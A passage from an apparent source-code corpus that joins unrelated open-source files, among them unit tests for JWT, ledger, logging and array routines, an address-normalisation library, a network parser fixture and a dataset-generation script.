thumbprint = 'C1:5D:EA:86:56:AD:DF:67:BE:80:31:D8:5E:BD:DC:5A:D6:C4:36:E7:AA'
self._create_jwt_and_match_expected_err(self.testCert, thumbprint)
def test_create_jwt_invalid_thumbprint_invalid_char(self):
thumbprint = 'C1:5D:EA:86:56:AD:DF:67:BE:80:31:D8:5E:BD:DC:5A:D6:C4:36:Ez'
self._create_jwt_and_match_expected_err(self.testCert, thumbprint)
if __name__ == '__main__':
unittest.main()
|
backend/db/test/user_photo_test.py
|
sleepingAnt/viewfinder
| 645 |
84537
|
<filename>backend/db/test/user_photo_test.py
# Copyright 2013 Viewfinder Inc. All Rights Reserved
"""Tests for UserPhoto data object."""
__author__ = '<EMAIL> (<NAME>)'
from base_test import DBBaseTestCase
from viewfinder.backend.db.user_photo import UserPhoto
from viewfinder.backend.db import versions
class UserPhotoTestCase(DBBaseTestCase):
def testAssetKeyToFingerprint(self):
def test(asset_key, expected):
self.assertEqual(UserPhoto.AssetKeyToFingerprint(asset_key), expected)
test('', None)
test('a/', None)
test('a/b', None)
test('a/#', None)
test('a/b#', None)
test('a/b#c', 'a/#c')
test('a/b##c', 'a/#c')
test('a/assets-library://asset/asset.JPG?id=D31F1D3C-CFB7-458F-BACD-7862D72098A6&ext=JPG#e5ad400c2214088928ef8400dcfb87bb3059b742',
'a/#e5ad400c2214088928ef8400dcfb87bb3059b742')
test('a/assets-library://asset/asset.JPG?id=D31F1D3C-CFB7-458F-BACD-7862D72098A6&ext=JPG',
None)
test('a/#e5ad400c2214088928ef8400dcfb87bb3059b742',
'a/#e5ad400c2214088928ef8400dcfb87bb3059b742')
def testMigration(self):
user_photo = UserPhoto.CreateFromKeywords(
user_id=1, photo_id='p1',
asset_keys=['a/b', 'a/c#d', 'a/e#d', 'a/f#g'])
user_photo._version = versions.REMOVE_ASSET_URLS.rank - 1
self._RunAsync(versions.Version.MaybeMigrate, self._client, user_photo,
[versions.REMOVE_ASSET_URLS])
print user_photo
self.assertEqual(user_photo.asset_keys.combine(), set(['a/#d', 'a/#g']))
def testMergeAssetKeys(self):
user_photo = UserPhoto.CreateFromKeywords(
user_id=1, photo_id='p1',
asset_keys=['a/#b', 'a/#f'])
user_photo.MergeAssetKeys(['a/b#c', 'a/d#c', 'a/e#f'])
self.assertEqual(user_photo.asset_keys.combine(), set(['a/#b', 'a/#c', 'a/#f']))
|
tests/index_routines.py
|
Saran-nns/cunumeric
| 118 |
84541
|
<reponame>Saran-nns/cunumeric
# Copyright 2021 NVIDIA Corporation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import numpy as np
from test_tools.generators import mk_seq_array
import cunumeric as num
from legate.core import LEGATE_MAX_DIM
def test():
choices1 = [
[0, 1, 2, 3],
[10, 11, 12, 13],
[20, 21, 22, 23],
[30, 31, 32, 33],
]
a1 = [2, 3, 1, 0]
num_a1 = num.array(a1)
num_choices1 = num.array(choices1)
aout = np.array([2.3, 3.0, 1.2, 0.3])
num_aout = num.array(aout)
assert np.array_equal(
np.choose(a1, choices1, out=aout),
num.choose(num_a1, num_choices1, out=num_aout),
)
assert np.array_equal(aout, num_aout)
b = [2, 4, 1, 0]
num_b = num.array(b)
assert np.array_equal(
np.choose(b, choices1, mode="clip"),
num.choose(num_b, num_choices1, mode="clip"),
)
assert np.array_equal(
np.choose(b, choices1, mode="wrap"),
num.choose(num_b, num_choices1, mode="wrap"),
)
a2 = [[1, 0, 1], [0, 1, 0], [1, 0, 1]]
choices2 = [-10, 10]
num_a2 = num.array(a2)
num_choices2 = num.array(choices2)
assert np.array_equal(
num.choose(num_a2, num_choices2), np.choose(a2, choices2)
)
a3 = np.array([0, 1]).reshape((2, 1, 1))
c1 = np.array([1, 2, 3]).reshape((1, 3, 1))
c2 = np.array([-1, -2, -3, -4, -5]).reshape((1, 1, 5))
num_a3 = num.array(a3)
num_c1 = num.array(c1)
num_c2 = num.array(c2)
assert np.array_equal(
np.choose(a3, (c1, c2)), num.choose(num_a3, (num_c1, num_c2))
)
for ndim in range(1, LEGATE_MAX_DIM + 1):
tgt_shape = (5,) * ndim
# try various shapes that broadcast to the target shape
shapes = [tgt_shape]
for d in range(len(tgt_shape)):
sh = list(tgt_shape)
sh[d] = 1
shapes.append(tuple(sh))
for choices_shape in shapes:
# make sure the choices are between 0 and 1
np_choices = mk_seq_array(np, choices_shape) % 2
num_choices = mk_seq_array(num, choices_shape) % 2
for rhs1_shape in shapes:
np_rhs1 = np.full(rhs1_shape, 42)
num_rhs1 = num.full(rhs1_shape, 42)
for rhs2_shape in shapes:
# make sure rhs1 and rhs2 have different values
np_rhs2 = np.full(rhs2_shape, 17)
num_rhs2 = num.full(rhs2_shape, 17)
np_res = np.choose(np_choices, (np_rhs1, np_rhs2))
num_res = num.choose(num_choices, (num_rhs1, num_rhs2))
assert np.array_equal(np_res, num_res)
return
if __name__ == "__main__":
test()
|
wrappers/python/tests/ledger/test_build_attrib_request.py
|
absltkaos/indy-sdk
| 636 |
84554
|
import json
import pytest
from indy import ledger, error
@pytest.mark.asyncio
async def test_build_attrib_request_works_for_raw_value():
identifier = "Th7MpTaRZVRYnPiabds81Y"
destination = "Th7MpTaRZVRYnPiabds81Y"
raw = '{"endpoint":{"ha":"127.0.0.1:5555"}}'
expected_response = {
"identifier": identifier,
"operation": {
"type": "100",
"dest": destination,
"raw": raw
}
}
response = json.loads(await ledger.build_attrib_request(identifier, destination, None, raw, None))
assert expected_response.items() <= response.items()
@pytest.mark.asyncio
async def test_build_attrib_request_works_for_hash_value():
identifier = "Th7MpTaRZVRYnPiabds81Y"
destination = "Th7MpTaRZVRYnPiabds81Y"
xhash = "83d907821df1c87db829e96569a11f6fc2e7880acba5e43d07ab786959e13bd3"
expected_response = {
"identifier": identifier,
"operation": {
"type": "100",
"dest": destination,
"hash": xhash
}
}
response = json.loads(await ledger.build_attrib_request(identifier, destination, xhash, None, None))
assert expected_response.items() <= response.items()
@pytest.mark.asyncio
async def test_build_attrib_request_works_for_enc_value():
identifier = "Th7MpTaRZVRYnPiabds81Y"
destination = "Th7MpTaRZVRYnPiabds81Y"
enc = "aa3f41f619aa7e5e6b6d0de555e05331787f9bf9aa672b94b57ab65b9b66c3ea960b18a98e3834b1fc6cebf49f463b81fd6e3181"
expected_response = {
"identifier": identifier,
"operation": {
"type": "100",
"dest": destination,
"enc": enc
}
}
response = json.loads(await ledger.build_attrib_request(identifier, destination, None, None, enc))
assert expected_response.items() <= response.items()
@pytest.mark.asyncio
async def test_build_attrib_request_works_for_missed_attribute():
identifier = "Th7MpTaRZVRYnPiabds81Y"
destination = "Th7MpTaRZVRYnPiabds81Y"
with pytest.raises(error.CommonInvalidStructure):
await ledger.build_attrib_request(identifier, destination, None, None, None)
|
nebullvm/optimizers/quantization/utils.py
|
emilecourthoud/nebullvm
| 821 |
84559
|
import warnings
from typing import Tuple, Callable, Any, List
import numpy as np
from nebullvm.base import QuantizationType
from nebullvm.inference_learners.base import BaseInferenceLearner
from nebullvm.measure import compute_relative_difference
def check_precision(
optimized_learner: BaseInferenceLearner,
input_data: List[Tuple[Any, ...]],
base_outputs_list: List[Tuple[Any, ...]],
perf_loss_ths: float,
metric_func: Callable = None,
ys: List = None,
aggregation_func: Callable = np.mean,
) -> bool:
metric_func = metric_func or compute_relative_difference
relative_differences = []
if ys is None:
ys = [None] * len(input_data)
for inputs, base_outputs, y in zip(input_data, base_outputs_list, ys):
opt_outputs = optimized_learner(*inputs)
relative_difference = max(
metric_func(base_output, opt_output, y)
for base_output, opt_output in zip(base_outputs, opt_outputs)
)
relative_differences.append(relative_difference)
relative_difference = aggregation_func(relative_differences)
return relative_difference <= perf_loss_ths
def check_quantization(
quantization_type: QuantizationType, perf_loss_ths: float
):
if quantization_type is None and perf_loss_ths is not None:
raise ValueError(
"When a quantization threshold is given it is necessary to "
"specify the quantization algorithm too."
)
if quantization_type is not None and perf_loss_ths is None:
warnings.warn(
"Got a valid quantization type without any given quantization "
"threshold. The quantization step will be ignored."
)
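# Hedged usage sketch, not part of the original module; the QuantizationType member
# name below is assumed for illustration. It only shows the contract of
# check_quantization: a threshold without an algorithm is an error, an algorithm
# without a threshold merely warns and the quantization step is skipped.
#
#   check_quantization(QuantizationType.DYNAMIC, perf_loss_ths=2.0)    # passes silently
#   check_quantization(None, perf_loss_ths=2.0)                        # raises ValueError
#   check_quantization(QuantizationType.DYNAMIC, perf_loss_ths=None)   # warns only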
|
tests/TestLogging.py
|
asukiaaa/cadquery
| 403 |
84568
|
import unittest
import mock
from copy import copy
from tests import BaseTest
import logging
# Units under test
import cadquery
from cadquery.freecad_impl import console_logging
class TestLogging(BaseTest):
def setUp(self):
# save root logger's state
root_logger = logging.getLogger()
self._initial_level = root_logger.level
self._initial_logging_handlers = copy(root_logger.handlers)
def tearDown(self):
# forcefully re-establish original log state
root_logger = logging.getLogger()
root_logger.level = self._initial_level
root_logger.handlers = self._initial_logging_handlers
# reset console_logging's global state
cadquery.freecad_impl.console_logging._logging_handler = None
@mock.patch('cadquery.freecad_impl.console_logging.FreeCAD')
def testConsoleMessage(self, mock_freecad):
console_logging.enable()
log = logging.getLogger('test')
log.info('foo')
mock_freecad.Console.PrintMessage.assert_called_once_with('foo\n')
mock_freecad.Console.PrintWarning.assert_not_called()
mock_freecad.Console.PrintError.assert_not_called()
@mock.patch('cadquery.freecad_impl.console_logging.FreeCAD')
def testConsoleWarning(self, mock_freecad):
console_logging.enable()
log = logging.getLogger('test')
log.warning('bar')
mock_freecad.Console.PrintMessage.assert_not_called()
mock_freecad.Console.PrintWarning.assert_called_once_with('bar\n')
mock_freecad.Console.PrintError.assert_not_called()
@mock.patch('cadquery.freecad_impl.console_logging.FreeCAD')
def testConsoleError(self, mock_freecad):
console_logging.enable()
log = logging.getLogger('test')
log.error('roo')
mock_freecad.Console.PrintMessage.assert_not_called()
mock_freecad.Console.PrintWarning.assert_not_called()
mock_freecad.Console.PrintError.assert_called_once_with('roo\n')
@mock.patch('cadquery.freecad_impl.console_logging.FreeCAD')
def testConsoleDebugOffDefault(self, mock_freecad):
console_logging.enable()
log = logging.getLogger('test')
log.debug('no show')
mock_freecad.Console.PrintMessage.assert_not_called()
mock_freecad.Console.PrintWarning.assert_not_called()
mock_freecad.Console.PrintError.assert_not_called()
@mock.patch('cadquery.freecad_impl.console_logging.FreeCAD')
def testConsoleSetLevelDebug(self, mock_freecad):
console_logging.enable(level=logging.DEBUG)
log = logging.getLogger('test')
log.debug('now showing')
mock_freecad.Console.PrintMessage.assert_called_once_with('now showing\n')
@mock.patch('cadquery.freecad_impl.console_logging.FreeCAD')
def testConsoleSetLevelWarning(self, mock_freecad):
console_logging.enable(level=logging.WARNING)
log = logging.getLogger('test')
log.info('no show')
log.warning('be warned')
mock_freecad.Console.PrintMessage.assert_not_called()
mock_freecad.Console.PrintWarning.assert_called_once_with('be warned\n')
@mock.patch('cadquery.freecad_impl.console_logging.FreeCAD')
def testConsoleLogFormat(self, mock_freecad):
console_logging.enable(format=">> %(message)s <<")
log = logging.getLogger('test')
log.info('behold brackets!')
mock_freecad.Console.PrintMessage.assert_called_once_with('>> behold brackets! <<\n')
@mock.patch('cadquery.freecad_impl.console_logging.FreeCAD')
def testConsoleEnableDisable(self, mock_freecad):
console_logging.enable()
console_logging.disable()
log = logging.getLogger('test')
log.error('nope, disabled')
mock_freecad.Console.PrintError.assert_not_called()
|
test/regression/features/integers/unary_minus.py
|
ppelleti/berp
| 137 |
84603
|
<reponame>ppelleti/berp
print(-1)
print(-0)
print(-(6))
print(-(12*2))
print(- -10)
|
src/genie/libs/parser/iosxe/tests/ShowKeyChain/cli/equal/golden_output1_expected.py
|
balmasea/genieparser
| 204 |
84617
|
expected_output = {
"key_chains": {
"bla": {
"keys": {
1: {
"accept_lifetime": {
"end": "always valid",
"is_valid": True,
"start": "always valid",
},
"key_string": "cisco123",
"send_lifetime": {
"end": "always valid",
"is_valid": True,
"start": "always valid",
},
},
2: {
"accept_lifetime": {
"end": "06:01:00 UTC Jan 1 2010",
"is_valid": False,
"start": "10:10:10 UTC Jan 1 2002",
},
"key_string": "blabla",
"send_lifetime": {
"end": "06:01:00 UTC Jan 1 2010",
"is_valid": False,
"start": "10:10:10 UTC Jan 1 2002",
},
},
},
},
"cisco": {
"keys": {
1: {
"accept_lifetime": {
"end": "infinite",
"is_valid": True,
"start": "11:11:11 UTC Mar 1 2001",
},
"key_string": "cisco123",
"send_lifetime": {
"end": "infinite",
"is_valid": True,
"start": "11:11:11 UTC Mar 1 2001",
},
},
2: {
"accept_lifetime": {
"end": "22:11:11 UTC Dec 20 2030",
"is_valid": True,
"start": "11:22:11 UTC Jan 1 2001",
},
"key_string": "cisco234",
"send_lifetime": {
"end": "always valid",
"is_valid": True,
"start": "always valid",
},
},
3: {
"accept_lifetime": {
"end": "always valid",
"is_valid": True,
"start": "always valid",
},
"key_string": "cisco",
"send_lifetime": {
"end": "always valid",
"is_valid": True,
"start": "always valid",
},
},
},
},
},
}
|
corehq/ex-submodules/phonelog/migrations/0013_delete_olddevicereportentry.py
|
dimagilg/commcare-hq
| 471 |
84701
|
# Generated by Django 1.10.7 on 2017-07-11 12:26
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('phonelog', '0012_server_date_not_null'),
]
operations = [
migrations.DeleteModel(
name='OldDeviceReportEntry',
),
]
|
i18naddress/__init__.py
|
rsat/google-i18n-address
| 112 |
84702
|
from __future__ import unicode_literals
import io
import json
import os
import re
from collections import OrderedDict
VALID_COUNTRY_CODE = re.compile(r"^\w{2,3}$")
VALIDATION_DATA_DIR = os.path.join(os.path.dirname(__file__), "data")
VALIDATION_DATA_PATH = os.path.join(VALIDATION_DATA_DIR, "%s.json")
FIELD_MAPPING = {
"A": "street_address",
"C": "city",
"D": "city_area",
"N": "name",
"O": "company_name",
"S": "country_area",
"X": "sorting_code",
"Z": "postal_code",
}
KNOWN_FIELDS = set(FIELD_MAPPING.values()) | {"country_code"}
def load_validation_data(country_code="all"):
if not VALID_COUNTRY_CODE.match(country_code):
raise ValueError("%r is not a valid country code" % (country_code,))
country_code = country_code.lower()
try:
        # VALIDATION_DATA_PATH may contain '%' placeholders; this branch is kept
        # for backwards compatibility with consumers of this package that import
        # VALIDATION_DATA_PATH directly.
path = VALIDATION_DATA_PATH % (country_code,)
except TypeError:
path = os.path.join(VALIDATION_DATA_DIR, "%s.json" % country_code)
if not os.path.exists(path):
raise ValueError("%r is not a valid country code" % (country_code,))
with io.open(path, encoding="utf-8") as data:
return json.load(data)
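# Illustrative usage, assuming the bundled JSON files follow the upstream Google
# libaddressinput layout (keys shown are examples, not guarantees):
#
#   rules = load_validation_data("us")            # {"US": {...}, "US/CA": {...}, ...}
#   defaults = load_validation_data("zz")["ZZ"]   # base defaults applied to every country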
class ValidationRules(object):
__slots__ = [
"country_code",
"country_name",
"address_format",
"address_latin_format",
"allowed_fields",
"required_fields",
"upper_fields",
"country_area_type",
"country_area_choices",
"city_type",
"city_choices",
"city_area_type",
"city_area_choices",
"postal_code_type",
"postal_code_matchers",
"postal_code_examples",
"postal_code_prefix",
]
def __init__(
self,
country_code,
country_name,
address_format,
address_latin_format,
allowed_fields,
required_fields,
upper_fields,
country_area_type,
country_area_choices,
city_type,
city_choices,
city_area_type,
city_area_choices,
postal_code_type,
postal_code_matchers,
postal_code_examples,
postal_code_prefix,
):
self.country_code = country_code
self.country_name = country_name
self.address_format = address_format
self.address_latin_format = address_latin_format
self.allowed_fields = allowed_fields
self.required_fields = required_fields
self.upper_fields = upper_fields
self.country_area_type = country_area_type
self.country_area_choices = country_area_choices
self.city_type = city_type
self.city_choices = city_choices
self.city_area_type = city_area_type
self.city_area_choices = city_area_choices
self.postal_code_type = postal_code_type
self.postal_code_matchers = postal_code_matchers
self.postal_code_examples = postal_code_examples
self.postal_code_prefix = postal_code_prefix
def __repr__(self):
return (
"ValidationRules("
"country_code=%r, "
"country_name=%r, "
"address_format=%r, "
"address_latin_format=%r, "
"allowed_fields=%r, "
"required_fields=%r, "
"upper_fields=%r, "
"country_area_type=%r, "
"country_area_choices=%r, "
"city_type=%r, "
"city_choices=%r, "
"city_area_type=%r, "
"city_area_choices=%r, "
"postal_code_type=%r, "
"postal_code_matchers=%r, "
"postal_code_examples=%r, "
"postal_code_prefix=%r)"
% (
self.country_code,
self.country_name,
self.address_format,
self.address_latin_format,
self.allowed_fields,
self.required_fields,
self.upper_fields,
self.country_area_type,
self.country_area_choices,
self.city_type,
self.city_choices,
self.city_area_type,
self.city_area_choices,
self.postal_code_type,
self.postal_code_matchers,
self.postal_code_examples,
self.postal_code_prefix,
)
)
def _make_choices(rules, translated=False):
sub_keys = rules.get("sub_keys")
if not sub_keys:
return []
choices = []
sub_keys = sub_keys.split("~")
sub_names = rules.get("sub_names")
if sub_names:
choices += [
(key, value) for key, value in zip(sub_keys, sub_names.split("~")) if value
]
else:
if not translated:
choices += [(key, key) for key in sub_keys]
if not translated:
sub_lnames = rules.get("sub_lnames")
if sub_lnames:
choices += [
(key, value)
for key, value in zip(sub_keys, sub_lnames.split("~"))
if value
]
sub_lfnames = rules.get("sub_lfnames")
if sub_lfnames:
choices += [
(key, value)
for key, value in zip(sub_keys, sub_lfnames.split("~"))
if value
]
return choices
def _compact_choices(choices):
value_map = OrderedDict()
for key, value in choices:
        if key not in value_map:
value_map[key] = set()
value_map[key].add(value)
return [
(key, value) for key, values in value_map.items() for value in sorted(values)
]
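# For example (duplicate labels for the same key collapse into one entry):
#   _compact_choices([("CA", "California"), ("CA", "California"), ("NY", "New York")])
#   -> [("CA", "California"), ("NY", "New York")]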
def _match_choices(value, choices):
if value:
value = value.strip().lower()
for name, label in choices:
if name.lower() == value:
return name
if label.lower() == value:
return name
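# For example, matching is case-insensitive against both the key and the label:
#   _match_choices("california", [("CA", "California")])   -> "CA"
#   _match_choices("texas", [("CA", "California")])         -> None (falls through)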
def _load_country_data(country_code):
database = load_validation_data("zz")
country_data = database["ZZ"]
if country_code:
country_code = country_code.upper()
if country_code.lower() == "zz":
raise ValueError("%r is not a valid country code" % (country_code,))
database = load_validation_data(country_code.lower())
country_data.update(database[country_code])
return country_data, database
def get_validation_rules(address):
country_code = address.get("country_code", "").upper()
country_data, database = _load_country_data(country_code)
country_name = country_data.get("name", "")
address_format = country_data["fmt"]
address_latin_format = country_data.get("lfmt", address_format)
format_fields = re.finditer(r"%([ACDNOSXZ])", address_format)
allowed_fields = {FIELD_MAPPING[m.group(1)] for m in format_fields}
required_fields = {FIELD_MAPPING[f] for f in country_data["require"]}
upper_fields = {FIELD_MAPPING[f] for f in country_data["upper"]}
languages = [None]
if "languages" in country_data:
languages = country_data["languages"].split("~")
postal_code_matchers = []
if "postal_code" in allowed_fields:
if "zip" in country_data:
postal_code_matchers.append(re.compile("^" + country_data["zip"] + "$"))
postal_code_examples = []
if "zipex" in country_data:
postal_code_examples = country_data["zipex"].split(",")
country_area_choices = []
city_choices = []
city_area_choices = []
country_area_type = country_data["state_name_type"]
city_type = country_data["locality_name_type"]
city_area_type = country_data["sublocality_name_type"]
postal_code_type = country_data["zip_name_type"]
postal_code_prefix = country_data.get("postprefix", "")
# second level of data is for administrative areas
country_area = None
city = None
city_area = None
if country_code in database:
if "sub_keys" in country_data:
for language in languages:
is_default_language = (
language is None or language == country_data["lang"]
)
matched_country_area = None
matched_city = None
if is_default_language:
localized_country_data = database[country_code]
else:
localized_country_data = database[
"%s--%s" % (country_code, language)
]
localized_country_area_choices = _make_choices(localized_country_data)
country_area_choices += localized_country_area_choices
existing_choice = country_area is not None
matched_country_area = country_area = _match_choices(
address.get("country_area"), localized_country_area_choices
)
if matched_country_area:
# third level of data is for cities
if is_default_language:
country_area_data = database[
"%s/%s" % (country_code, country_area)
]
else:
country_area_data = database[
"%s/%s--%s" % (country_code, country_area, language)
]
if not existing_choice:
if "zip" in country_area_data:
postal_code_matchers.append(
re.compile("^" + country_area_data["zip"])
)
if "zipex" in country_area_data:
postal_code_examples = country_area_data["zipex"].split(",")
if "sub_keys" in country_area_data:
localized_city_choices = _make_choices(country_area_data)
city_choices += localized_city_choices
existing_choice = city is not None
matched_city = city = _match_choices(
address.get("city"), localized_city_choices
)
if matched_city:
# fourth level of data is for dependent sublocalities
if is_default_language:
city_data = database[
"%s/%s/%s" % (country_code, country_area, city)
]
else:
city_data = database[
"%s/%s/%s--%s"
% (country_code, country_area, city, language)
]
if not existing_choice:
if "zip" in city_data:
postal_code_matchers.append(
re.compile("^" + city_data["zip"])
)
if "zipex" in city_data:
postal_code_examples = city_data["zipex"].split(",")
if "sub_keys" in city_data:
localized_city_area_choices = _make_choices(city_data)
city_area_choices += localized_city_area_choices
existing_choice = city_area is not None
matched_city_area = city_area = _match_choices(
address.get("city_area"), localized_city_area_choices
)
if matched_city_area:
if is_default_language:
city_area_data = database[
"%s/%s/%s/%s"
% (country_code, country_area, city, city_area)
]
else:
city_area_data = database[
"%s/%s/%s/%s--%s"
% (
country_code,
country_area,
city,
city_area,
language,
)
]
if not existing_choice:
if "zip" in city_area_data:
postal_code_matchers.append(
re.compile("^" + city_area_data["zip"])
)
if "zipex" in city_area_data:
postal_code_examples = city_area_data[
"zipex"
].split(",")
country_area_choices = _compact_choices(country_area_choices)
city_choices = _compact_choices(city_choices)
city_area_choices = _compact_choices(city_area_choices)
return ValidationRules(
country_code,
country_name,
address_format,
address_latin_format,
allowed_fields,
required_fields,
upper_fields,
country_area_type,
country_area_choices,
city_type,
city_choices,
city_area_type,
city_area_choices,
postal_code_type,
postal_code_matchers,
postal_code_examples,
postal_code_prefix,
)
class InvalidAddress(ValueError):
def __init__(self, message, errors):
super(InvalidAddress, self).__init__(message)
self.errors = errors
def _normalize_field(name, rules, data, choices, errors):
value = data.get(name)
if name in rules.upper_fields and value is not None:
value = value.upper()
data[name] = value
if name not in rules.allowed_fields:
data[name] = ""
elif not value and name in rules.required_fields:
errors[name] = "required"
elif choices:
if value or name in rules.required_fields:
value = _match_choices(value, choices)
if value is not None:
data[name] = value
else:
errors[name] = "invalid"
if not value:
data[name] = ""
def normalize_address(address):
errors = {}
try:
rules = get_validation_rules(address)
except ValueError:
errors["country_code"] = "invalid"
else:
cleaned_data = address.copy()
country_code = cleaned_data.get("country_code")
if not country_code:
errors["country_code"] = "required"
else:
cleaned_data["country_code"] = country_code.upper()
_normalize_field(
"country_area", rules, cleaned_data, rules.country_area_choices, errors
)
_normalize_field("city", rules, cleaned_data, rules.city_choices, errors)
_normalize_field(
"city_area", rules, cleaned_data, rules.city_area_choices, errors
)
_normalize_field("postal_code", rules, cleaned_data, [], errors)
postal_code = cleaned_data.get("postal_code", "")
if rules.postal_code_matchers and postal_code:
for matcher in rules.postal_code_matchers:
if not matcher.match(postal_code):
errors["postal_code"] = "invalid"
break
_normalize_field("street_address", rules, cleaned_data, [], errors)
_normalize_field("sorting_code", rules, cleaned_data, [], errors)
if errors:
raise InvalidAddress("Invalid address", errors)
return cleaned_data
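# Minimal sketch of normalize_address in use (address values are illustrative only):
#
#   cleaned = normalize_address({
#       "country_code": "us",
#       "country_area": "California",
#       "city": "Mountain View",
#       "postal_code": "94043",
#       "street_address": "1600 Amphitheatre Pkwy",
#   })
#
# On success the country code is upper-cased and choice fields are replaced by their
# canonical keys (e.g. "California" -> "CA"); on failure InvalidAddress is raised and
# its ``errors`` dict maps field names to "required" or "invalid".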
def _format_address_line(line_format, address, rules):
def _get_field(name):
value = address.get(name, "")
if name in rules.upper_fields:
value = value.upper()
return value
replacements = {
"%%%s" % code: _get_field(field_name)
for code, field_name in FIELD_MAPPING.items()
}
fields = re.split("(%.)", line_format)
fields = [replacements.get(f, f) for f in fields]
return "".join(fields).strip()
def get_field_order(address, latin=False):
"""
Returns expected order of address form fields as a list of lists.
Example for PL:
>>> get_field_order({'country_code': 'PL'})
[[u'name'], [u'company_name'], [u'street_address'], [u'postal_code', u'city']]
"""
rules = get_validation_rules(address)
address_format = rules.address_latin_format if latin else rules.address_format
address_lines = address_format.split("%n")
replacements = {
"%%%s" % code: field_name for code, field_name in FIELD_MAPPING.items()
}
all_lines = []
for line in address_lines:
fields = re.split("(%.)", line)
single_line = [replacements.get(field) for field in fields]
single_line = list(filter(None, single_line))
all_lines.append(single_line)
return all_lines
def format_address(address, latin=False):
rules = get_validation_rules(address)
address_format = rules.address_latin_format if latin else rules.address_format
address_line_formats = address_format.split("%n")
address_lines = [
_format_address_line(lf, address, rules) for lf in address_line_formats
]
address_lines.append(rules.country_name)
address_lines = filter(None, address_lines)
return "\n".join(address_lines)
def latinize_address(address, normalized=False):
if not normalized:
address = normalize_address(address)
cleaned_data = address.copy()
country_code = address.get("country_code", "").upper()
dummy_country_data, database = _load_country_data(country_code)
if country_code:
country_area = address["country_area"]
if country_area:
key = "%s/%s" % (country_code, country_area)
country_area_data = database.get(key)
if country_area_data:
cleaned_data["country_area"] = country_area_data.get(
"lname", country_area_data.get("name", country_area)
)
city = address["city"]
key = "%s/%s/%s" % (country_code, country_area, city)
city_data = database.get(key)
if city_data:
cleaned_data["city"] = city_data.get(
"lname", city_data.get("name", city)
)
city_area = address["city_area"]
key = "%s/%s/%s/%s" % (country_code, country_area, city, city_area)
city_area_data = database.get(key)
if city_area_data:
cleaned_data["city_area"] = city_area_data.get(
"lname", city_area_data.get("name", city_area)
)
return cleaned_data
|
generate/generate_sentihood_NLI_M.py
|
bubblemans/ABSA-BERT-pair
| 462 |
84722
|
<reponame>bubblemans/ABSA-BERT-pair
import os
from data_utils_sentihood import *
data_dir='../data/sentihood/'
aspect2idx = {
'general': 0,
'price': 1,
'transit-location': 2,
'safety': 3,
}
(train, train_aspect_idx), (val, val_aspect_idx), (test, test_aspect_idx) = load_task(data_dir, aspect2idx)
print("len(train) = ", len(train))
print("len(val) = ", len(val))
print("len(test) = ", len(test))
train.sort(key=lambda x:x[2]+str(x[0])+x[3][0])
val.sort(key=lambda x:x[2]+str(x[0])+x[3][0])
test.sort(key=lambda x:x[2]+str(x[0])+x[3][0])
dir_path = data_dir+'bert-pair/'
if not os.path.exists(dir_path):
os.makedirs(dir_path)
with open(dir_path+"train_NLI_M.tsv","w",encoding="utf-8") as f:
f.write("id\tsentence1\tsentence2\tlabel\n")
for v in train:
f.write(str(v[0])+"\t")
word=v[1][0].lower()
if word=='location1':f.write('location - 1')
elif word=='location2':f.write('location - 2')
elif word[0]=='\'':f.write("\' "+word[1:])
else:f.write(word)
for i in range(1,len(v[1])):
word=v[1][i].lower()
f.write(" ")
if word == 'location1':
f.write('location - 1')
elif word == 'location2':
f.write('location - 2')
elif word[0] == '\'':
f.write("\' " + word[1:])
else:
f.write(word)
f.write("\t")
if v[2]=='LOCATION1':f.write('location - 1 - ')
if v[2]=='LOCATION2':f.write('location - 2 - ')
if len(v[3])==1:
f.write(v[3][0]+"\t")
else:
f.write("transit location\t")
f.write(v[4]+"\n")
with open(dir_path+"dev_NLI_M.tsv","w",encoding="utf-8") as f:
f.write("id\tsentence1\tsentence2\tlabel\n")
for v in val:
f.write(str(v[0])+"\t")
word=v[1][0].lower()
if word=='location1':f.write('location - 1')
elif word=='location2':f.write('location - 2')
elif word[0]=='\'':f.write("\' "+word[1:])
else:f.write(word)
for i in range(1,len(v[1])):
word=v[1][i].lower()
f.write(" ")
if word == 'location1':
f.write('location - 1')
elif word == 'location2':
f.write('location - 2')
elif word[0] == '\'':
f.write("\' " + word[1:])
else:
f.write(word)
f.write("\t")
if v[2]=='LOCATION1':f.write('location - 1 - ')
if v[2]=='LOCATION2':f.write('location - 2 - ')
if len(v[3])==1:
f.write(v[3][0]+"\t")
else:
f.write("transit location\t")
f.write(v[4]+"\n")
with open(dir_path+"test_NLI_M.tsv","w",encoding="utf-8") as f:
f.write("id\tsentence1\tsentence2\tlabel\n")
for v in test:
f.write(str(v[0])+"\t")
word=v[1][0].lower()
if word=='location1':f.write('location - 1')
elif word=='location2':f.write('location - 2')
elif word[0]=='\'':f.write("\' "+word[1:])
else:f.write(word)
for i in range(1,len(v[1])):
word=v[1][i].lower()
f.write(" ")
if word == 'location1':
f.write('location - 1')
elif word == 'location2':
f.write('location - 2')
elif word[0] == '\'':
f.write("\' " + word[1:])
else:
f.write(word)
f.write("\t")
if v[2]=='LOCATION1':f.write('location - 1 - ')
if v[2]=='LOCATION2':f.write('location - 2 - ')
if len(v[3])==1:
f.write(v[3][0]+"\t")
else:
f.write("transit location\t")
f.write(v[4]+"\n")
|
WebMirror/management/rss_parser_funcs/feed_parse_extractLizonkanovelsWordpressCom.py
|
fake-name/ReadableWebProxy
| 193 |
84748
|
def extractLizonkanovelsWordpressCom(item):
'''
Parser for 'lizonkanovels.wordpress.com'
'''
vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
if not (chp or vol) or "preview" in item['title'].lower():
return None
tagmap = [
('bestial blade by priest', 'bestial blade', 'translated'),
('creatures of habit by meat in the shell', 'creatures of habit', 'translated'),
('seal cultivation for self-improvement by mo xiao xian', 'seal cultivation for self-improvement', 'translated'),
('PRC', 'PRC', 'translated'),
('Loiterous', 'Loiterous', 'oel'),
]
for tagname, name, tl_type in tagmap:
if tagname in item['tags']:
return buildReleaseMessageWithType(item, name, vol, chp, frag=frag, postfix=postfix, tl_type=tl_type)
return False
|
ch49-计算摄影学-图像去噪/1-fastNlMeansDenoisingColored.py
|
makelove/OpenCV-Python-Tutorial
| 2,875 |
84760
|
<gh_stars>1000+
